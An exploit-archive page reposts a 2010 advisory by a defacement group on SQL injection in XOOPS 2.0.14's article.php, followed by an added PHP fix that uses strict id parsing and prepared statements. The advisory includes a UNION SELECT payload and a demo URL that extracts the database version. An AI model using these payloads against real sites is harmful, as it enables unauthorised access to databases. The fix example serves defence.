XOOPS 2.0.14 remote SQL injection vulnerability in article.php

CVE: N/A
Category: CWE-89
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2010-09-03
CPE: cpe:/a:xoops:xoops:2.0.14
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010090008

Below is a copy:

###
# [#] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability     #
# [#] Discovered By []0iZy5                                      #
# [#] http://r00tDefaced.com & uNkn0wn.eu(is back)               #
# [#] Greetz: Gn0515, Silic0n, my bb(denys) & r00tDefaced Members#
###
#
# [2]-SQL injection
#
# Vulnerability Description:
#               SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
#
# Affected items:
#          http://127.0.0.1/path/modules/articles/article.php?id=[SQL Injection]
#         
# Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [You can find the number of vulnerable query]
# Demo: http://www.site.com/modules/articles/article.php?id=1%20union%20all%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
#
# The Risk:
#     By exploiting this vulnerability, an attacker can inject malicious code in the script and can have access to the database.
#
# Fix the vulnerability:
#     To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parametrized statements must be used (preferred), or user input must be carefully escaped or filtered.
#
####
  
# r00tDefaced.com [28/08/2010]
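
The fix described in the advisory above (strong typing of the id parameter plus a parameterized statement), as an added example that is not part of the advisory or of XOOPS itself. The articles table, its columns, the function names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical article lookup, not XOOPS source code.
// Table/column names are assumptions; in-memory SQLite stands in for MySQL.

/** Strictly parse the ?id= value: only a positive decimal integer passes. */
function parseArticleId(mixed $raw): ?int
{
    // Arrays (?id[]=1), signs, spaces, comments and SQL keywords all fail here.
    if (!is_string($raw) || preg_match('/\A[1-9][0-9]{0,8}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

/** Look up one article; returns null for invalid ids and for missing rows. */
function fetchArticle(PDO $db, mixed $rawId): ?array
{
    $id = parseArticleId($rawId);
    if ($id === null) {
        return null; // caller answers 400/404; no query is ever built
    }
    // The placeholder keeps the value out of the SQL text entirely.
    $stmt = $db->prepare('SELECT id, title FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO articles (id, title) VALUES (1, 'Welcome')");

// Constructed inputs: one valid id, then values that are not plain integers.
$inputs = ['1', '2', '-1337 union select 1,2', '1 union all select 1,2', '1--', ['1']];
foreach ($inputs as $input) {
    $row = fetchArticle($db, $input);
    printf("%-28s => %s\n", json_encode($input), $row ? $row['title'] : 'rejected or not found');
}
```

With the pdo_mysql driver, also set PDO::ATTR_EMULATE_PREPARES to false so that the server performs the parameter binding.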



Copyright ©2024 Exploitalert.
